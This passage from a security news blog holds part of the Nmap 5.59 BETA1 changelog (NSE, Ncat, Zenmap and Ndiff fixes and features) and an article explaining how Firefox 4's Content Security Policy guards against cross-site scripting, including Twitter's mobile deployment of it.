 dns-zone-transfer from the set of scripts run by default (leaving
 them "intrusive"), and reclassifying dns-recursion, ftp-bounce,
 http-open-proxy, and socks-open-proxy as "safe" rather than
 "intrusive" (keeping them in the "default" set).

o [NSE] Added a credential storage library (creds.lua) and modified
 the brute library and scripts to make use of it. [Patrik]

o [Ncat] Created a portable version of ncat.exe that you can just drop
 onto Microsoft Windows systems without having to run any installer
 or copy over extra library files. See the Ncat page
 (http://nmap.org/ncat/) for binary downloads and a link to build
 instructions. [Shinnok]

o Fix a segmentation fault which could occur when running Nmap on
 various Android-based phones.  The problem related to NULL being
 passed to freeaddrinfo(). [David, Vlatko Kosturjak]

o [NSE] The host.bin_ip and host.bin_ip_src entries now also work with
 16-byte IPv6 addresses. [David]

o [Ncat] Updated the ca-bundle.crt list of trusted certificate
 authority certificates. [David]

o [NSE] Fixed a bug in the SMB Authentication library which could
 prevent concurrently running scripts with valid credentials from
 logging in. [Chris Woodbury]

o [NSE] Re-worked http-form-brute.nse to better autodetect form
 fields, allow brute force attempts where only the password (no
 username) is needed, follow HTTP redirects, and better detect
 incorrect login attempts. [Patrik, Daniel Miller]

o [Zenmap] Changed the "slow comprehensive scan" profile's NSE script
 selection from "all" to "default or (discovery and safe)"
 categories.  Except for testing and debugging, "--script all" is
 rarely desirable.

o [NSE] Added the stdnse.silent_require method which is used for
 library requires that you know might fail (e.g. "openssl" fails if
 Nmap was compiled without that library).  If these libraries are
 called with silent_require and fail to load, the script will cease
 running but the user won't be presented with ugly failure messages
 as would happen with a normal require. [Patrick Donnelly]

o [Ncat] ncat now listens on both localhost and ::1 when you run ncat
 -l. It works as before if you specify -4 or -6 or a specific
 address. [Colin Rice]

o [Zenmap] Fixed a bug in topology mapper which caused endpoints
 behind firewalls to sometimes show up in the wrong place (see
 http://seclists.org/nmap-dev/2011/q2/733).  [Colin Rice]

o [Zenmap] If you scan a system twice, any open ports from the first
 scan which are closed in the 2nd will be properly marked as
 closed. [Colin Rice].

o [Zenmap] Fixed an error that could cause a crash ("TypeError: an
 integer is required") if a sort column in the ports table was unset.
 [David]

o [Ndiff] Added nmaprun element information (Nmap version, scan date,
 etc.) to the diff.  Also, the Nmap banner with version number and
 data is now only printed if there were other differences in the
 scan. [Daniel Miller, David, Dr. Jesus]

o [NSE] Added nmap.get_interface and nmap.get_interface_info functions
 so scripts can access characteristics of the scanning interface.
 Removed nmap.get_interface_link. [Djalal]

o Fixed an overflow in scan elapsed time display that caused negative
 times to be printed after about 25 days. [Daniel Miller]

o Updated nmap-rpc from the master list, now maintained by IANA.
 [Daniel Miller, David]

o [Zenmap] Fixed a bug in the option parser: -sN (null scan) was
 interpreted as -sn (no port scan). This was reported by
 Shitaneddine. [David]

o [Ndiff] Fixed the Mac OS X packages to use the correct path for
 Python: /usr/bin/python instead of /opt/local/bin/python. The bug
 was reported by Wellington Castello. [David]

o Removed the -sR (RPC scan) option--it is now an alias for -sV
 (version scan), which always does RPC scan when an rpcinfo service
 is detected.

o [NSE] Improved the ms-sql scripts and library in several ways:
 - Improved version detection and server discovery
 - Added support for named pipes, integrated authentication, and
   connecting to instances by name or port
 - Improved script and library stability and documentation.
 [Patrik Karlsson, Chris Woodbury]

o [NSE] Fixed http.validate_options when handling a cookie table.
 [Sebastian Prengel]

o Added a Service Tags UDP probe for port 6481/udp. [David]

o [NSE] Enabled firewalk.nse to automatically find the gateways at
 which probes are dropped and fixed various bugs. [Henri Doreau]

o [Zenmap] Worked around a pycairo bug that prevented saving the
 topology graphic as PNG on Windows: "Error Saving Snapshot:
 Surface.write_to_png takes one argument which must be a filename
 (str), file object, or a file-like object which has a 'write' method
 (like StringIO)". The problem was reported by Alex Kah. [David]

o The -V and --version options now show the platform Nmap was compiled
 on, which features are compiled in, the version numbers of libraries
 it is linked against, and whether the libraries are the ones that
 come with Nmap or the operating system.  [Ambarisha B., David]

o Fixed some inconsistencies in nmap-os-db reported by Xavier Sudre
 from netVigilance.

o The Nmap Win32 uninstaller now properly deletes nping.exe. [Fyodor]

o [NSE] Added a shortport.ssl function which can be used as a script
 portrule to match SSL services.  It is similar in concept to our
 existing shortport.http. [David]

o Set up the RPM build to use the compat-glibc and compat-gcc-34-c++
 packages (on CentOS 5.3) to resolve a report of Nmap failing to run
 on old versions of Glibc. [David]

o We no longer support Nmap on versions of Windows earlier than XP
 SP2.  Even Microsoft no longer supports Windows versions that old.
 But if you must use Nmap on such systems anyway, please see

https://secwiki.org/w/Nmap_On_Old_Windows_Releases.

o There were hundreds of other little bug fixes and improvements
 (especially to NSE scripts).  See the SVN logs for revisions 22,274
 through 24,460 for details.

To Download Nmap 5.59 BETA 1 Click HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Nmap 5.59 BETA1 (With 40 new NSE scripts)"https://www.voiceofgreyhat.com/2011/07/nmap-559-beta1-with-40-new-nse-scripts.html</a>

Firefox 4 Supports Content Security Policy

Content Security Policy is a standard developed by Mozilla designed to protect against cross sitescripting (XSS) attacks. Cross site scripting attacks use vulnerabilities in websites to inject JavaScript code into pages or urls of that site. The injected JavaScript code is then executed when visitors open a specifically prepared link or page on the website. Attacks can have serious consequences, it may for instance be possible to steal cookies from users to impersonate them on the site.

Content Security Policy has been in development for quite some time.. The basic idea behind the standard is to give webmasters a tool at hand to whitelist JavaScript, and other objects and files, that may be executed on the site. This implementation blocks all JavaScript code that is executed on the site and not in the list of allowed sites, which means that attackers cannot exploit possible XSS vulnerabilities on the website or server.

A browser supporting CSP ignores code that is not in the whitelist. Browsers who do not support CSP ignore the policy.

Content Security Protection for Users

CSP is currently only supported by Firefox 4, Thunderbird 3.3 and SeaMonkey 2.1. You can test the functionality by visiting this test page.

Twitter recently announced that they have added CSP to their mobile version, accessible under mobile.twitter.com. Users who use one of the aforementioned browsers are protected from XSS attacks on that website.

The engineers on Twitter removed all JavaSCript from code and implemented the CSP header. They then restricted the header to Firefox 4 users and created a rule set to allow JavaScript from their assets. This included the content deliver network used to deliver stylesheets and user profiles.

Unexpected issues were encountered by the developers. They noticed for instance that some Firefox add-ons were inserting JavaScript on page load, which triggered a threat report. The Twitter engineers noticed furthermore that some ISPs inserted JavaScript code or altered image tags for caching reasons.

They managed to resolve those problems by mandating SSL for all Firefox 4 users who access the mobile Twitter web site.

A test with Firebug shows that the mobile version of Twitter is indeed using the policy on site. Please note that Twitter makes a user agent check and is very restrictive about it. Firefox 5 or Firefox 6 users won’t get the policy currently.

Content Security Protection for Webmasters

Webmasters may have some work at hand to add support for CSP to their website. JavaScript code that is directly embedded in documents will not be executed anymore, which has several implications. Webmasters need to move the code to external JavaScript files.

Policies are specified with the X-Content-Security-Policy header. The header X-Content-Security-Policy: allow ‘self’ *.ghacks.net for instance allows JavaScript to be loaded from ghacks.net and all subdomains of ghacks.net.

The using CSP guide on Mozilla offers additional examples on how to set the right headers.

Browsers that do not support CSP ignore the header.

CSP offers two additional forms of protection. It mitigates clickjacking attacks. Clickjacking refers to directing a user’s mouse click to a target on another site. This is often done by using transparent frames on the original website.

Content Security Policy can also be used to mitigate packet sniffing attacks, as it allows the webmaster to specific protocols that are allowed to be used. It is for instance possible to force HTTPS only connections.

The CSP Policy directives are accessible here on Mozilla.

Next to the already mentioned options are parameters to specific hosts where images, media files, objects or fonts may be loaded from.

Plugins are available for WordPress and Drupal that add the policy to supported websites automatically when activated.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Firefox 4 Supports Content Security Policy"https://www.voiceofgreyhat.com/2011/05/firefox-4-supports-content-security.html</a>